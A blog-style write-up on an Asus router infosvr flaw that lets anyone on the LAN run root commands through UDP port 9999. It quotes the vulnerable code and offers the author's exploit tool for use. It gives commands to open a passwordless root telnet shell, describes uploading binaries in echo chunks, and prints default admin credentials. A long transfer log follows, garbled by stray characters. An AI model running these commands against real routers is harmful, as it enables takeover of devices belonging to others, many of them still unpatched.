Exploiting root vulnerability in Asus routers

In early 2015, Asus fixed a critical vulnerability in its routers. The "hole" was in a service called infosvr , used by Asus utilities to facilitate the configuration of the router by automatically detecting it on the local network. The vulnerability allowed to execute any commands with root privileges (after all, infosvr is also root ), which gave the attacker full control over the system.

But Asus has released patched firmware. Now it's all in the past. Or not? Hmm ... And how often do ordinary people update firmware on their routers?



I ask for a cut for details, discovery history, research, instructions and ... exploits.

What's the matter?


The infosvr service listens on port 9999 ( UDP ). When a packet arrives at least 512 bytes in size, it analyzes it and, depending on its type, performs the corresponding response actions. For example, it collects information about some settings of the router and sends it to the Device Discovery program, which helps to find the IP address of the router. But there is also a type of package that involves the execution of a system command by a router. It was then that Asus'ovtsy screwed up. Due to an error in the processing code of such a package, the command can be executed without any authorization. This is the line if (memcpy (phdr_ex-> MacAddress, mac, 6) == 0) in the following listing (non-essential lines removed):

Part of the processPacket function (int sockfd, char * pdubuf) from common.c
if (phdr->OpCode!=NET_CMD_ID_GETINFO && phdr->OpCode!=NET_CMD_ID_GETINFO_MANU)
{
	phdr_ex = (IBOX_COMM_PKT_HDR_EX *)pdubuf;
	// Check Mac Address
	if (memcpy(phdr_ex->MacAddress, mac, 6)==0)
	{
		_dprintf("Mac Error %2x%2x%2x%2x%2x%2x\n",
			(unsigned char)phdr_ex->MacAddress[0],
			(unsigned char)phdr_ex->MacAddress[1],
			(unsigned char)phdr_ex->MacAddress[2],
			(unsigned char)phdr_ex->MacAddress[3],
			(unsigned char)phdr_ex->MacAddress[4],
			(unsigned char)phdr_ex->MacAddress[5]
		);
		return NULL;
	}
	phdr_res->Info = phdr_ex->Info;
	memcpy(phdr_res->MacAddress, phdr_ex->MacAddress, 6);
}


Probably, instead of memcpy , memcmp was supposed to be there (this is what happens when you copy lines of code with the aim of slightly correcting it later), but instead of == it was assumed! =. But even if this error did not exist, it would still be enough to know the MAC address for penetration .

After successful “authentication” the command from the package will be executed:

Same function; a bit further on the code
switch(phdr->OpCode)
{
	case NET_CMD_ID_MANU_CMD:
		#define MAXSYSCMD 256
		char cmdstr[MAXSYSCMD];
		PKT_SYSCMD *syscmd;
		syscmd = (PKT_SYSCMD *)(pdubuf+sizeof(IBOX_COMM_PKT_HDR_EX));
		if (syscmd->len>=MAXSYSCMD) syscmd->len=MAXSYSCMD;
		syscmd->cmd[syscmd->len]=0;
		syscmd->len=strlen(syscmd->cmd);
		fprintf(stderr,"system cmd: %d %s\n", syscmd->len, syscmd->cmd);
		sprintf(cmdstr, "%s > /tmp/syscmd.out", syscmd->cmd);
		system(cmdstr);



Now, do you want a quest?

  • Go here
  • Choose any router
  • Follow the path Support -> Drivers and Utilities -> OS -> Firmware
  • Look for the firmware for January 2015 in the list
  • In the description there is probably a mean phrase " Fixed infosvr security issue. "
  • ???
  • !!!

Impressive scale? In fact, everything was not so bad (and now, when the "hole" was closed - generally good). The fact is that infosvr works with the br0 interface , i.e. with a bridge between other interfaces. In case the router works in IP Sharing mode (general IP mode), br0 combines eth0 and wlan0 . Notice eth1 (which is WAN ) is not included here. Those. already glad that no one will crawl from the external network. But when the router is in Access point mode , then br0 integrates all the interfaces ...

Discovery history


Somehow I wanted to steer my router through UART , that is, through the hardware console. “Why such difficulties? Come on telnet. ” - you say. There it was! This is RT-N10E! (He's RT-N10LX).

Do you see a telnet switch here? Me neither


Later I found out that it could be like this:
192.168.1.1/telnetd.cgi?enable=1



I won’t tell much about how crappy the router is. Who faced - knows. And for the lucky ones who didn’t have to bother with it, I will say that the Asus RT-xxxE (or RT-xxxLX) routers have a processor from Realtek, for which there are no alternative firmware! Although the community is trying . On official firmware, I used PPTP a couple of years ago. Constant freezes, breaks and other joys. PPPoE at first did not rise at all (they fixed it in some firmware). Now this router works just like a bridge between WiFi and Ethernet.

Learn more about the differences between RT-xxxE and RT-xxxLX
The difference between Asus RT-N10E and Asus RT-N10LX
In fact, this is the same router, Asus RT-N10LX has a 2 dBi antenna, RT-N10E - 5 dBi. In the specifications for the RT-N10LX, IEEE 802.11d is additionally indicated - in fact, it means only that the router takes into account regional legal restrictions in the field of communications, and therefore a weaker antenna is used. Personally, I came across a copy (2012 of assembly) with a small antenna at 2 dBi, while all the markings on the router and the box indicate that this is RT-N10E, and not RT-N10LX. If you carefully look at the information on the official website, it says: “Antenna type will differ according to local regulations and requirement in each country” and “This model sells only in EU, China, and South America”. As they say, the same eggs, only in profile. The firmware in these two models is the same.

Difference between Asus RT-N10E / LX and RT-N12E / LX
In the 12th model, the same processor, but a different controller - RTL8192CE, which allows you to use 2 MIMO, providing theoretically up to 300 Mbps. The difference between the RT-N12E and RT-N12LX versions is in the antennas.

Difference between Asus RT-N10E / LX and Asus RT-N10
ASUS also has RT-N10 and RT-N12 routers. And here it is important to understand, these are other devices that are assembled on the basis of Broadcom chips. For RT-N10 and RT-N12 there are alternative firmware enthusiasts, including "from Oleg." Be careful when buying!
A source


So, connected to UART.

Connect to UART


Turn on. We see the boot process. (Cap: By the way, you won’t see this through telnet. That's it!)
So loading the router looks through / dev / console (/ dev / ttyS0)
========== SPI ==============
SDRAM CLOCK: 156MHZ
- Force into Single IO Mode - | No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32 |
- --- RealTek (RTL8196C) at 2012.04.09-16: 54 + 0800 version v1.1f [16bit] (390MHz)

#### return_addr: 0x05010000, root_bin_offset: 0x050dd012
Jump to image start = 0x80500000 ...
decompressing kernel:
Uncompressing Linux ... done, booting the kernel.
done decompressing kernel.
start address: 0x80003600
RTL8192C / RTL8188C driver version 1.6 (2011-07-18)

Probing RTL8186 10/100 NIC-kenel stack size order [2] ...
chip name: 8196C, chip revid: 4
NOT YET
eth0 added. vid = 9 Member port 0x10 ...
eth1 added. vid = 8 Member port 0x1 ...
eth2 added. vid = 9 Member port 0x2 ...
eth3 added. vid = 9 Member port 0x4 ...
eth4 added. vid = 9 Member port 0x8 ...
[peth0] added, mapping to [eth1] ...
init started: BusyBox v1.13.4 (2014-09-18 18:01:50 CST)

## flash.c free apmib ##
Init Start ...

## system / sysconf.c free apmib ##

## flash.c free apmib ##
===== Set parameter for BSMI test =====
Init bridge interface ...
syslog will use 64KB for log (7 rotate, 1 original, 8KB for each)
Init Wlan application ...

## flash.c free apmib ##

## flash.c free apmib ##
Init Firewall Rules ...
No wan ip currently!
Init WAN Interface ...
start_wan: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
set_dhcp_client: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
start_wan_dhcp_client: iface eth1
No

such.07 MiniDIGI 07.07.17 05.07.21 05.07.21 .

System TZ ENV = GMT-2
Restart networkmap

## system / sysconf.c free apmib ##
start infosvr
router ip = 192.168.1.1
mac addr = 50: 46: 5d: 86: 76: fc
WLAN0_WLAN_DISABLED = 0 ## flash.c free apmib ##
sh: ## flash.c: unknown operand
# Start wanduck!
Start httpd!

# 1: Enable direct rule

After the download was completed, I began to research the system: software versions, hardware, and other information that can be obtained using the console. But more on that later.

It is interesting to see the reaction to standard user actions, such as: clicking on the WPS button, setting via the web face, using Asus Utility ... Indeed, the relevant information appeared on the console. We should also mention this fact: when trying to open the web interface, httpd (presumably) writes the login and password to / dev / console (/ dev / ttyS0) to enter!
UserID: admin
UserPass: asus-rt
True, this does not get on telnet (/ dev / ttyp0).

Of the entire Asus Utility package (Device Discovery, Router Setup Wizard, and Firmware Restoration), only the Router Setup Wizard caused a reaction from the console. Namely: when you start the application and click on the "Next" button, the following lines appear:
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> / tmp / syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

Hmm ...
Does the Router Setup Wizard send these commands? I looked through Wireshark - yes, these commands are transmitted in UDP packets with RSW. But what if you replace them with your own?

Turns out I'm not the first

Before I started picking my bags, I decided to google it. And he googled something ( one and two ). The second link provides a detailed description of the vulnerability and a simple exploit for Linux (there is also on python).

AsusCmd Bike


I would like to have such a program under Windows, since I use it exactly 95% of the time. I don’t want to boot a virtual machine from Ubuntu for the sake of executing some command.

Dimensions

In the process of writing and debugging the exploit, as well as digging in the infosvr sources, the "parameters" of this "hole" were found out.
Namely, its size. They are as follows:
The size of the receive and send buffers is 420 bytes each. And all would be nice, but in reality the router can only send 420 bytes in response. But with the reception, things are even worse. The fact is that after receiving the infosvr command, it truncates it to 256 characters and only then executes it. But this is not the last limitation. When executing a command with a length of just under 256 characters, infosvr crashes with the crash of a segmentation fault. The command has been completed, but there will be no answer, nor the ability to execute something else. Empirically, the maximum safe length of the user command was found. it238 characters. So, the size of the "hole": 238 - the team, 420 - the answer.

Details (with an example)
infosvr causes
system ("echo" Some text "> / var / myText; cat / var / myText> /tmp/syscmd.out");

Here is the complete command:
'echo "Some text"> / var / myText; cat / var / myText> /tmp/syscmd.out'

Where:
'echo "Some text"> / var / myText; cat / var / myText'
- a command sent by the user using AsusCmd;
'> /tmp/syscmd.out'
- hardcoded in infosvr code .

By the way, why do I need to redirect to /tmp/syscmd.out? And then, what exactly from it is then read into the buffer 420 bytes and the response to the command is sent.

“Safe Length Limit” refers specifically to the user command.

Those. with a custom command length of 238 characters, the full command will be 238 + 18 = 256. Maybe the developers wanted to avoid infosvr crashes when they cut the command to 256 characters? It looks like they did not account for strlen ("> /tmp/syscmd.out").


The exploit is written and debugged. You can use it .

Work example


But it’s not very convenient to steer a router. And, if in this case the restriction of 238 characters of the command is not very noticeable, then the restriction on the output of the answer of 420 characters is already sadder. But there is a way! Though on the router and greatly limited busybox , but there all the same there telnetd ! It is better to run it on a non-standard port, as there is no protection: no password is needed to connect.
AsusCmd.exe "telnetd -l / bin / sh -p777"
Well, now another thing! You can fully command with all the amenities, such as the history of teams and the addition of Tab. If the telnet stops responding, you can restart it without restarting the router. First you need to nail the sh associated with it :
AsusCmd.exe "killall -9 sh"
Note that after executing this command, sh , which is associated with / dev / console, will also be killed . Now you can run telnetd again .

Excellent. Is the topic exhausted? It’s not so.

Banquet Continuation


So, we can use all available commands. We can create and delete files in directories that are writable (ramfs / var ). You can write a long text file with several commands. But not just text! After all, echo on Linux can convert text to binary data! This means that we can upload our programs to the router, which we lack!

AsusBinWrite

The idea is simple:
  • read a portion of bytes from the source file
  • convert them to a text view understandable for ' echo -e '
  • we form a system team
  • send to the router
  • repeat until we forward the entire file


But it is in words all easy and simple. In practice, we are dealing with a couple of unpleasant factors:
  • UDP packets that are sometimes lost
  • Limit on the useful length of the system command (238 characters)


With the restriction on the useful length of the command, everything is clear: you just have to send more packets. The bad thing in this case is that the transmission speed suffers. After all, the router processor has to process many small packets. Those. transfer rate is directly proportional to the processor speed of the router. (Tested with cpuload : while AsusBinWrite is running, the CPU of the router is 100% loaded).

UDP is more complicated. It is necessary to somehow control the correctness of the transfer. The primitive way - just appending the next bytes to the end of the file - is not suitable. If one packet on the way to the router gets lost or duplicated, the file is already defective. Therefore, the decision was made to first write the individual parts to different files and check their contents. And then you can combine them. And one more thing: they should not be combined at the very end, but after a certain number of transferred parts. Because one part takes up memory space not, say, 40 bytes (file-part size), but all 4 KB (page). And if there are a thousand parts? No RAM is enough (On the RT-N10E it is only 16MB). After successful merging (success is also checked by the sign of increasing the size of the target file on the router), these parts are deleted. So in a loop we transfer the entire file to the end.

Example of transferring an executable file

To better understand the algorithm of work, I propose to see what happens on / dev / console (/ dev / ttyS0) during file transfer and compare this with the output of AsusBinWrite itself .

AsusBinWrite output (note cases of packet loss)
Start uploading file to 255.255.255.255 ...
Source file: 'Useful \ ldd' Target file: '/ var / ldd'
0.5% 742.4 Bps part 1 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.0% 106.5 Bps part 2 (49 B; cmd: 237 ch) LOST
1.0% 32.7 Bps part 2 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.5% 347.5 Bps part 3 (49 B; cmd: 237 ch) 192.168.1.1 : OK
1.9% 159.1 Bps part 4 (49 B; cmd: 237 ch) שש 192.168.1.1: OK
2.4% 150.3 Bps part 5 (49 B; cmd: 237 ch) שש LOST
2.4% 32.2 Bps part 5 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.9% 376.9 Bps part 6 (49 B; cmd: 237 ch) ש LOST
2.9% 32.6 Bps part 6 (49 B; cmd: 237 ch) 192.168.1.1: OK
3.4% 401.6 Bps part 7 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
3.9% 146.3 Bps part 8 (49 B; cmd: 237 ch) 192.168.1.1: OK
4.4% 102.3 Bps part 9 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
4.8% 150.0 Bps part 10 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.3% 176.5 Bps part 11 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.8% 120.9 Bps part 12 (48 B; cmd: 235 ch) שש 192.168.1 .1: OK
6.3% 145.5 Bps part 13 (48 B; cmd: 235 ch) 192.168.1.1: OK
6.8% 144.6 Bps part 14 (48 B; cmd: 235 ch) ש LOST
6.8% 31.7 Bps part 14 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.2% 285.7 Bps part 15 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.7% 147.7 Bps part 16 (48 B; cmd: 235 ch) LOST
7.7% 32.0 Bps part 16 (48 B; cmd: 235 ch) 192.168.1.1: OK
8.2% 333.3 Bps part 17 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
8.7% 146.3 Bps part 18 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
9.1% 148.1 Bps part 19 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
9.6% 141.6 Bps part 20 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
10.1% 145.0 Bps part 21 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.6% 145.5 Bps part 22 (48 B; cmd: 235 ch ) ש 192.168.1.1: OK
11.0% 148.1 Bps part 23 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
11.5% 145.9 Bps part 24 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
12.0% 137.5 Bps part 25 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.5% ​​146.3 Bps part 26 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.9% 151.9 Bps part 27 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
13.4% 172.0 Bps part 28 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
13.9% 126.0 Bps part 29 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
14.4% 173.3 Bps part 30 (48 B; cmd: 235 ch) ש LOST
14.4% 31.7 Bps part 30 (48 B; cmd: 235 ch) 192.168.1.1: OK
14.8% 358.2 Bps part 31 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
15.3% 144.6 Bps part 32 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
15.8% 149.5 Bps part 33 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
16.3% 137.1 Bps part 34 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
16.7% 153.8 Bps part 35 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
17.2% 138.7 Bps part 36 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
17.7% 145.5 Bps part 37 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.2% 140.4 Bps part 38 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.7% 154.3 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 31.6 Bps part 39 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.1% 428.6 Bps part 40 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
19.6% 175.2 Bps part 41 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
20.1% 120.6 Bps part 42 (48 B; cmd: 235 ch) 192.168.1.1: OK
20.6% 146.3 Bps part 43 (48 B; cmd: 235 ch) ש 192.168.1 .1: OK
21.0% 150.0 Bps part 44 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
21.5% 145.0 Bps part 45 (48 B; cmd: 235 ch) שש LOST
21.5% 31.0 Bps part 45 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.0% 363.6 Bps part 46 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
22.5% 137.9 Bps part 47 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.9% 154.3 Bps part 48 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
23.4% 145.0 Bps part 49 (48 B; cmd: 235 ch) שש LOST
23.4% 31.9 Bps part 49 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.9% 360.9 Bps part 50 (48 B; cmd: 235 ch) שש LOST
23.9% 31.8 Bps part 50 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.4% 345.3 Bps part 51 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.8% 151.4 Bps part 52 (48 B; cmd: 235 ch) ש LOST
24.8% 31.6 Bps part 52 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.3% 342.9 Bps part 53 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
25.8% 145.0 Bps part 54 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
26.3% 151.4 Bps part 55 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
26.7% 145.5 Bps part 56 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
27.2% 147.7 Bps part 57 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
27.7% 143.7 Bps part 58 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
28.2% 142.9 Bps part 59 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
28.6% 142.9 Bps part 60 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
29.1% 149.1 Bps part 61 (48 B; cmd: 235 ch) 192.168.1.1: OK
29.6% 142.4 Bps part 62 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
30.1% 142.9 Bps part 63 (48 B; cmd: 235 ch) 192.168.1.1: OK
30.6% 145.9 Bps part 64 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
31.0% 148.1 Bps part 65 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
31.5% 144.6 Bps part 66 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
32.0% 141.2 Bps part 67 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
32.5% 142.9 Bps part 68 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.9% 151.4 Bps part 69 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
33.4% 143.7 Bps part 70 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
33.9% 146.8 Bps part 71 (48 B; cmd: 235 ch ) ש 192.168.1.1: OK
34.4% 183.9 Bps part 72 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.8% 144.1 Bps part 73 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
35.3% 117.1 Bps part 74 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
35.8% 144.6 Bps part 75 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.3% 144.6 Bps part 76 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.7% 151.4 Bps part 77 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
37.2% 172.0 Bps part 78 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.7% 119.7 Bps part 79 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.2% 143.7 Bps part 80 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.6% 151.9 Bps part 81 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
39.1% 143.7 Bps part 82 (48 B; cmd: 235 ch) ש 192.168.1 .1: OK
39.6% 146.8 Bps part 83 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
40.1% 183.9 Bps part 84 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
40.5% 117.1 Bps part 85 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
41.0% 142.9 Bps part 86 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
41.5% 147.2 Bps part 87 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
42.0% 179.1 Bps part 88 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.5% 145.5 Bps part 89 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
42.9% 136.8 Bps part 90 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.4% 120.0 Bps part 91 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.9% 151.9 Bps part 92 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
44.4% 143.3 Bps part 93 (48 B; cmd: 235 ch) ש 192 .168.1.1: OK
44.8% 146.3 Bps part 94 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
45.3% 145.9 Bps part 95 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
45.8% 138.7 Bps part 96 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.3% 151.4 Bps part 97 (48 B; cmd: 235 ch) ש LOST
46.3% 31.8 Bps part 97 (48 B; cmd: 235 ch ) 192.168.1.1: OK
46.7% 436.4 Bps part 98 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
47.2% 138.7 Bps part 99 (48 B; cmd: 235 ch) LOST
47.2% 32.0 Bps part 99 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.7% 378.0 Bps part 100 (48 B; cmd: 237 ch ) שש 192.168.1.1: OK
Merging to /
var / ldd parts 1..16 (16 pcs; cmd : 238 ch) ... OK (1545 B)
Merging to / var / ldd parts 33..48 (16 pcs; cmd: 238 ch) ... OK (2313 B)
Merging to / var / ldd parts 49..64 (16 pcs ; cmd: 238 ch) ... OK (3081 B)
Merging to / var / ldd parts 65.80 (16 pcs; cmd: 238 ch) ... OK (3849 B)
Merging to / var / ldd parts 81..96 ( 16 pcs; cmd: 238 ch) ... OK (4617 B)
Merging to / var / ldd parts 97..100 (4 pcs; cmd: 71 ch) ... OK (4809 B)
Written 4.70KB / 9.85KB 77.0 Bps (avg ) Remaining: 01:08 (01: 02/02: 10)

48.2% 5.2 Bps part 101 (49 B; cmd: 237 ch) 192.168.1.1: OK
48.7% 116.7 Bps part 102 (49 B; cmd: 237 ch) שש 192.168.1.1: OK
49.1% 196.8 Bps part 103 (49 B; cmd: 237 ch) LOST
49.1% 32.7 Bps part 103 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.6% 418.8 Bps part 104 (49 B; cmd: 237 ch) שש 192.168.1.1: OK
50.1% 138.8 Bps part 105 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.6% 150.8 Bps part 106 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.1% 153.6 Bps part 107 (49 B; cmd: 237 ch) שש 192.168.1.1: OK
51.6% 151.7 Bps part 108 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
52.1% 142.4 Bps part 109 (49 B; cmd: 237 ch) ש 192 .168.1.1: OK
52.5% 145.5 Bps part 110 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
53.0% 150.9 Bps part 111 (48 B; cmd: 235 ch) ש LOST
53.0% 31.7 Bps part 111 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.5% 410.3 Bps part 112 (48 B; cmd: 235 ch ) שש 192.168.1.1: OK
54.0% 143.3 Bps part 113 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
54.4% 144.6 Bps part 114 (48 B; cmd: 235 ch) שש 192.168.1.1 : OK
54.9% 141.6 Bps part 115 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.4% 150.0 Bps part 116 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
55.9% 140.4 Bps part 117 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
56.3% 151.9 Bps part 118 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
56.8% 142.0 Bps part 119 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
57.3% 145.5 Bps part 120 (48 B; cmd: 235 ch) 192.168.1.1: OK
57.8% 140.8 Bps part 121 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.3% 154.3 Bps part 122 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
58.7% 144.6 Bps part 123 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.2% 141.2 Bps part 124 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.7% 138.7 Bps part 125 (48 B; cmd: 235 ch) 192.168.1.1 : OK
60.2% 151.9 Bps part 126 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
60.6% 142.9 Bps part 127 (48 B; cmd: 235 ch) ש LOST
60.6% 31.9 Bps part 127 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.1% 378.0 Bps part 128 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
61.6% 142.4 Bps part 129 (48 B; cmd: 235 ch) 192.168.1.1 : OK
62.1% 150.0 Bps part 130 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
62.5% 136.8 Bps part 131 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
63.0% 154.3 Bps part 132 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.5% 149.1 Bps part 133 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
64.0% 145.9 Bps part 134 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
64.4% 142.4 Bps part 135 (48 B; cmd: 235 ch ) שש 192.168.1.1: OK
64.9% 147.7 Bps part 136 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
65.4% 146.8 Bps part 137 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
65.9% 142.0 Bps part 138 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
66.3% 179.8 Bps part 139 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
66.8% 121.2 Bps part 140 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
67.3% 182.5 Bps part 141 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
67.8% 119.4 Bps part 142 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
68.2% 146.3 Bps part 143 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
68.7% 145.0 Bps part 144 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.2% 142.4 Bps part 145 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
69.7% 142.9 Bps part 146 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.2% 145.0 Bps part 147 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.6% 142.0 Bps part 148 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.1% 152.9 Bps part 149 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
71.6% 177.1 Bps part 150 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.1% 122.8 Bps part 151 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
72.5% 143.3 Bps part 152 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
73.0% 145.9 Bps part 153 (48 B; cmd: 235 ch) ש LOST
73.0% 31.7 Bps part 153 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.5% 432.4 Bps part 154 (48 B; cmd: 235 ch ) ש 192.168.1.1: OK
74.0% 144.6 Bps part 155 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
74.4% 145.5 Bps part 156 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
74.9% 182.5 Bps part 157 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
75.4% 117.1 Bps part 158 ​​(48 B; cmd: 235 ch) ש 192.168.1.1: OK
75.9% 148.6 Bps part 159 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
76.3% 183.9 Bps part 160 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
76.8% 140.4 Bps part 161 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
77.3% 121.2 Bps part 162 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.8% 149.1 Bps part 163 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
78.2% 141.6 Bps part 164 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
78.7% 145.0 Bps part 165 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
79.2% 148.1 Bps part 166 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
79.7% 176.5 Bps part 167 (48 B; cmd: 235 ch) 192.168.1.1: OK
80.1% 121.5 Bps part 168 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
80.6% 145.5 Bps part 169 (48 B; cmd: 235 ch) שש 192.168.1.1 : OK
81.1% 144.6 Bps part 170 (48 B; cmd: 235 ch)
שש LOST 81.1% 31.7 Bps part 170 (48 B; cmd: 235 ch) 192.168.1.1: OK
81.6% 417.4 Bps part 171 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
82.1% 144.6 Bps part 172 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
82.5% 182.5 Bps part 173 (48 B; cmd: 235 ch) 192.168.1.1: OK
83.0% 119.4 Bps part 174 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
